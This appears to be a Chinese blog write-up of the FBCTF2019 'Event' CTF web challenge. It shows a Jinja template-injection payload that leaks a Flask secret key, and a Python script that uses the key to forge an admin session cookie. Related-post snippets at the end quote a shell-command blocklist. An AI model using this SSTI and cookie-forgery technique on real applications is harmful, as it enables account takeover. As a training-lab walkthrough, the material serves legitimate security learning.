[FBCTF2019]Event

最新推荐文章于 2022-08-27 15:02:25 发布
最新推荐文章于 2022-08-27 15:02:25 发布
阅读量684 收藏 1
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/108871462
版权

打开题目,只有一个登录注册框,无法使用admin登录注册
在这里插入图片描述在 /flag 页面中提示我们并不是管理员,猜测要得到管理员权限才可以Get Flag
在这里插入图片描述
在主页看到表单,先随意输入一些值进去,页面回显了Name of your event 的值
在这里插入图片描述
在这里插入图片描述
这里有可能存在xss或者SSTI,尝试后,无css,应该存在SSTI
抓包发现cookie,event_sesh_cookie应该是jwt加密过
在这里插入图片描述
大致猜测出本题应该是可以通过SSTI得到密钥伪造cookie,越权登录admin的账户
在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显
接着查找配置文件:__class__.__init__.__globals__[app].config
在这里插入图片描述
得到的密钥为fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y
使用flask-session-cookie-manager脚本对cookie进行解密,解密得

{'_fresh': True, '_id':'8b6d6fd19fd9858e95e3f61d19e9c27b2aa6a90cd137be5835bfb650aaa1fcca9824642c9a6e98b3b60dd0a629bb50b19c83c251656db2531c8d2fe7a4501e36', 'user_id': '1'}

尝试修改user_id的值并不能实现越权,因此要关注另外一串cookie user
IjY2NjY2Ig.X3L06w.aL_kfz7lIbOLXUp83dWdQgOHKQY
但是我们不知道这个cookie的加密方式,不过已知密钥,即可伪造签名
构造exp

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

在这里插入图片描述
ImFkbWluIg.X3L9vw.Vjo-AqvLZVgpr5ZM6DZ3GaN_zSo
然后将签名替换上去,即可成为admin用户,Get Flag
在这里插入图片描述

沫忆末忆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FBCTF 搭建部署全纪实
single7_的博客
10-23 1040
FBCTF 搭建部署全纪实 缘由 最近有点小需求需要搭建一个CTF平台,打架可以看看前期CTF平台上的探索,最后决定为FBCTF。选择FBCTF并不代表该项目为最优秀,只是考虑到最佳效果。废话少说,现在我们开始部署。 数据库部分 部署的过程放着不说,先把数据库部分完成,数据库本身没有开放远程登录功能。 1.使用root用户登录到数据库中,修改用户登录范围,将红框中的值根据实际情况修改为% 2.登陆不上查看防火墙配置。 3.再登录不上查看端口监听状态。发现 3306 绑定了 127.0.0.1 修改 my
Event sourcing
最新发布
05-04
Event Sourcing 和 CQRS 在微服务系统架构中的应用 Event Sourcing 是一种软件架构模式,它将系统状态的变化作为事件的序列来描述。事件源系统会记录所有的状态变化,包括业务逻辑和数据模型的变化。这种架构模式...
BUUCTF:[FBCTF2019]Event
末初的CSDN博客
07-29 850
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
BUUCTF--[FBCTF2019]Event
qq_46263951的博客
08-14 237
进入页面,注册登录 访问flag 查看Cookie,这里很容易就猜到是要伪造Cookie 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名. 看大佬的wp知道 在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config 发现加密所需的密钥,伪造session from flask import Flask from flask.sessio...
BUUCTF [FBCTF2019] Event
Senimo
01-13 429
BUUCTF [FBCTF2019] Event 考点: Flask模版注入 伪造Session登陆 非常规格式SECRET_KEY加密 启动环境: 一个登陆注册页面,若点击Admin panel,提示: 使用Username:test,Password:test登陆后: 并没有限制登陆,可能是成功注册用户test 可以向数据库中添加新的事件,尝试添加: Name:hahaha Address:8.8.8.8 得到回显: 其选项框可以选择显示添加的事件名或事件地址 此时再次点击Admin p
C#event线程安全
01-27
在C#编程中,`event`关键字用于实现发布/订阅模式,它确保了代码的封装性和安全性。在多线程环境中,线程安全是至关重要的,尤其是涉及到共享数据时。在C#中,`event`的实现考虑了线程安全问题,尤其是在C#3.0和4.0...
Flash Event写法
10-30
flash下event事件驱动方法
Event .rar
03-11
在IT行业中,事件(Event)是程序设计中的一个重要概念,尤其在多线程和异步编程中扮演着核心角色。在本项目"Event project"中,我们可以推断这可能是一个关于事件处理、事件分发或者事件驱动系统的设计。下面将详细...
EventManager.cs
07-12
Unity 游戏通知 支持多参数传递和返回值的通知,从无参到三个参数,可自行扩展至更多参数
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-02
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
[FBCTF2019]Event(flask 伪造签名)
paidx0
08-27 293
[FBCTF2019]Event(flask 伪造签名)
[FBCTF2019]RCEService
qq_61142406的博客
05-28 214
源码: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|
FBCTF2019-RCEService
anwen12的博客
02-26 232
0x01 题目初现 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
NO.3-9 [FBCTF2019]RCEService
nigo134的博客
08-06 275
题目叫我们以JSON的格式提交命令,先随便输 提交JSON格式 ?cmd={"cmd":"ls"} 但是经测试发现很多命令被禁止了 在网上找到的源码2333: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt de...
FacebookCTF2019 web writeup
river
06-05 3296
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值